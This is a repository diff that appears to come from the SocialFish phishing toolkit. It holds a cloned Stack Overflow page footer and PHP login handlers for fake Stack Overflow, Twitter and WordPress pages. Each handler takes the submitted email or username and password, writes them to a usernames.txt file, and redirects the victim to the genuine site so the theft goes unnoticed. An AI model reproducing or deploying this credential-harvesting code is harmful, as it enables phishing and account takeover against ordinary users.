<ul class="-list">
<li class="-item"><a href="https://english.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="linguists, etymologists, and serious English language enthusiasts">English Language &amp; Usage</a></li>
<li class="-item"><a href="https://skeptics.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="scientific skepticism">Skeptics</a></li>
<li class="-item"><a href="https://judaism.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="those who base their lives on Jewish law and tradition and anyone interested in learning more">Mi Yodeya (Judaism)</a></li>
<li class="-item"><a href="https://travel.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="road warriors and seasoned travelers">Travel</a></li>
<li class="-item"><a href="https://christianity.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="committed Christians, experts in Christianity and those interested in learning more">Christianity</a></li>
<li class="-item"><a href="https://ell.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="speakers of other languages learning English">English Language Learners</a></li>
<li class="-item"><a href="https://japanese.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="students, teachers, and linguists wanting to discuss the finer points of the Japanese language">Japanese Language</a></li>
</ul></nav><nav class="-nav js-category" data-name="Culture / Recreation"><ul class="-list">
<li class="-item"><a href="https://gaming.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="passionate videogamers on all platforms">Arqade (gaming)</a></li>
<li class="-item"><a href="https://bicycles.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="people who build and repair bicycles, people who train cycling, or commute on bicycles">Bicycles</a></li>
<li class="-item"><a href="https://rpg.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="gamemasters and players of tabletop, paper-and-pencil role-playing games">Role-playing Games</a></li>
<li class="-item"><a href="https://anime.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="anime and manga fans">Anime &amp; Manga</a></li>
<li class="-item"><a href="https://puzzling.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="those who create, solve, and study puzzles">Puzzling</a></li>
<li class="-item"><a href="https://mechanics.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="mechanics and DIY enthusiast owners of cars, trucks, and motorcycles">Motor Vehicle Maintenance &amp; Repair</a></li>
<li class="-item">
<a href="https://stackexchange.com/sites#culturerecreation" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 26 })">
<strong>
more (32)
</strong>
</a>
</li>
</ul>
</nav>
<nav class="-nav js-category" data-name="Science">
<ul class="-list">
<li class="-item"><a href="https://mathoverflow.net" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="professional mathematicians">MathOverflow</a></li>
<li class="-item"><a href="https://math.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="people studying math at any level and professionals in related fields">Mathematics</a></li>
<li class="-item"><a href="https://stats.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="people interested in statistics, machine learning, data analysis, data mining, and data visualization">Cross Validated (stats)</a></li>
<li class="-item"><a href="https://cstheory.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="theoretical computer scientists and researchers in related fields">Theoretical Computer Science</a></li>
<li class="-item"><a href="https://physics.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="active researchers, academics and students of physics">Physics</a></li>
<li class="-item"><a href="https://chemistry.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="scientists, academics, teachers and students">Chemistry</a></li>
<li class="-item"><a href="https://biology.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="biology researchers, academics, and students">Biology</a></li>
</ul></nav><nav class="-nav js-category" data-name="Science"><ul class="-list">
<li class="-item"><a href="https://cs.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="students, researchers and practitioners of computer science">Computer Science</a></li>
<li class="-item"><a href="https://philosophy.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="those interested in the study of the fundamental nature of knowledge, reality, and existence">Philosophy</a></li>
<li class="-item">
<a href="https://stackexchange.com/sites#science" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 26 })">
<strong>
more (10)
</strong>
</a>
</li>
</ul>
</nav>
<nav class="-nav js-category" data-name="Other">
<ul class="-list">
<li class="-item"><a href="https://meta.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="meta-discussion of the Stack Exchange family of Q&amp;A websites">Meta Stack Exchange</a></li>
<li class="-item"><a href="https://stackapps.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="apps, scripts, and development with the Stack Exchange API">Stack Apps</a></li>
<li class="-item"><a href="https://api.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="programmatic interaction with Stack Exchange sites">API</a></li>
<li class="-item"><a href="https://data.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="querying Stack Exchange data using SQL">Data</a></li>
<li class="-item"><a href="https://area51.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="proposing new sites in the Stack Exchange network">Area 51</a></li>
</ul>
</nav>
<div class="-copyright g-row jc-end">
<div class="g-column jc-sp-between">
<ul class="-list">
<li class="-item"><a class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link:4 })" href="https://stackoverflow.blog?blb=1">Blog</a></li>
<li class="-item"><a href="https://www.facebook.com/officialstackoverflow/" class="-link">Facebook</a></li>
<li class="-item"><a href="https://twitter.com/stackoverflow" class="-link">Twitter</a></li>
<li class="-item"><a href="https://linkedin.com/company/stack-overflow" class="-link">LinkedIn</a></li>
</ul>
<div>
<p>
site design / logo &#169; 2018 Stack Exchange Inc; user contributions licensed under <a href="https://creativecommons.org/licenses/by-sa/3.0/" rel="license" class="-link">cc by-sa 3.0</a>
with <a href="https://stackoverflow.blog/2009/06/25/attribution-required/" rel="license" class="-link">attribution required</a>.
<span id="svnrev">rev&nbsp;2018.1.25.28581</span>
</p>
</div>
</div>
</div>
</div>
</div>
</footer>
<noscript>
<div id="noscript-warning">Stack Overflow works best with JavaScript enabled
<img src="https://pixel.quantserve.com/pixel/p-c1rF4kxgLUzNc.gif" alt="" class="dno">
</div>
</noscript>
<script>
(function(i, s, o, g, r, a, m) {
i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function() { (i[r].q = i[r].q || []).push(arguments) }, i[r].l = 1 * new Date(); a = s.createElement(o),
m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m);
})(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
StackExchange.ready(function () {
var trackingCodes = [
'UA-5620270-1'
];
StackExchange.ga.init({
sendTitles: true,
tracker: window.ga,
trackingCodes: trackingCodes
});
StackExchange.ga.setDimension('dimension3', 'Users/Login');
StackExchange.ga.trackPageView();
});
/**/
var _qevents = _qevents || [],
_comscore = _comscore || [];
(function() {
var ssl = 'https:' == document.location.protocol,
s = document.getElementsByTagName('script')[0],
qc = document.createElement('script');
qc.async = true;
qc.src = (ssl ? 'https://secure' : 'http://edge') + '.quantserve.com/quant.js';
s.parentNode.insertBefore(qc, s);
_qevents.push({ qacct: "p-c1rF4kxgLUzNc" });
/**/
var sc = document.createElement('script');
sc.async = true;
sc.src = (ssl ? 'https://sb' : 'http://b') + '.scorecardresearch.com/beacon.js';
s.parentNode.insertBefore(sc, s);
_comscore.push({ c1: "2", c2: "17440561" });
})();
</script>
</body>
</html>

View File

@ -0,0 +1,15 @@
<?php
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
if($myFile == $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: https://stackoverflow.com/');
}
if($myFile != $searchString) {
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
}
exit();
?>

View File

@ -0,0 +1 @@
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>

1297
WebPages/twitter/index.html Normal file

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,14 @@
<?php
$var = $_POST['usernameOrEmail'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
if($myFile == $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: https://twitter.com/');
}
if($myFile != $searchString) {
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
}
exit();
?>

View File

@ -0,0 +1 @@
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,15 @@
<?php
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
if($myFile == $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: http://wordpress.org/');
}
if($myFile != $searchString) {
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
}
exit();
?>

View File

@ -0,0 +1 @@
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>

BIN
donation.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 6.3 KiB

1
requirements.txt Normal file
View File

@ -0,0 +1 @@
wget==3.2

BIN
sc.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 575 KiB

BIN
social.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.8 KiB

BIN
video.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 311 KiB